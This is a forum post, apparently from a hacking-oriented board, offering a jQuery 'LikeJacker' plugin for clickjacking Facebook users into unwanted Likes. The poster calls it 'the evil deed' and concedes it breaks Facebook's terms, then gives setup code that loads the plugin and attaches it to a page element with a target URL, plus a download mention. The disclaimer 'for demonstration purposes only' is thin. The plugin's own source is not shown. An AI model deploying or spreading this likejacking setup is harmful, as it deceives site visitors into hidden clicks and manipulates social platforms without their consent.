User Tag List

2738Views
Results 1 to 1 of 1
  1. #1
    Member
    Join Date
    Jan 2018
    Posts
    23
    Coins
    1
    Thumbs Up
    Received: 6
    Given: 0

    Cool jQuery Likejacker For Facebook Fans

    1 - jQuery Likejacker
    LikeJacker is a jQuery plugin, for doing the evil deed of clickjacking or likejacking. It is really easy to use, and shows how this can be done with ease. I wrote it some time ago in pure JavaScript, but as a exericie I converted it to a jQuery plugin. It is for demonstration purposes only.
    2 - Yes. But you might get banned from facebook, and it is a very shady thing to do. It is against the TOS. You should not use it!
    To be able to post links or images your post count must be 10 or greater. You currently have 5 posts.
    Please remove links from your message, then you will be able to submit your post.
    Setup:
    Include jQuery and the likejacker
    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
    <script type="text/javascript" src="js/jquery.likejacker.js"></script>
    Append it to a element
    <script type="text/javascript">
    $(function () {
    $('.likejackerZone').likejacker({
    target: 'http://example.com'
    });
    });
    </script>
    Downoald


    0 Not allowed! Not allowed!
    Last edited by benakka; 02-01-2018 at 11:47 PM.

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •